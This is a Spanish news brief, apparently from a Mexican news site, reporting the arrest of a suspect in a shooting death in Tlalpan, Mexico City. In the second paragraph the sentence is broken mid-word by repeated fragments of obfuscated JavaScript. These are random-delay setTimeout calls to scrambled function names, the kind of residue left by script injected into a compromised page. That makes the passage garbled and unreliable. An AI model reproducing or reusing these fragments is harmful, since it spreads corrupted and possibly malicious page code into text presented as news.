Cae presunto homicida en Tlalpan

México. La Policía de Investigación de la Procuraduría capitalina aprehendió a un hombre, acusado de privar de la vida a una persona el año pasado en la colonia Vistas del Pedregal, delegación Tlalpan.

De acuerdo con la carpeta de investigación, iniciada por el delito de homicidio por disparo de arma de fuego, el día de los hechos la víctima circulaba a bordo de una camioneta, cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o se encontró con unos amigos a quienes ofreció llevar a su domicilio.

Al llegar al cruce de las calles Naranjo y Ceiba, los ocupantes del vehículo fueron interceptados y agredidos con palos y piedras por un grupo de personas, lo que provocó que el agraviado perdiera el control del automotor y volcara.

Posteriormente, el implicado se aproximó y comenzó a disparar en diversas ocasiones, lo que ocasionó la muerte del conductor, mientras que los otros pasajeros lograron huir de la agresión.

Derivado de los trabajos que realizó la Policía de Investigación, se logró conocer la probable participación del imputado, por lo que se solicitó a un Juez del Sistema de Justicia Penal Acusatorio la orden de aprehensión en su contra, la cual fue cumplimentada el pasado 14 de agosto.

En un comunicado, la Procuraduría General de Justicia de la Ciudad de México informó que el indiciado fue ingresado al Reclusorio Preventivo Varonil Oriente.

Fuente: Notimex

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Back to top button
Close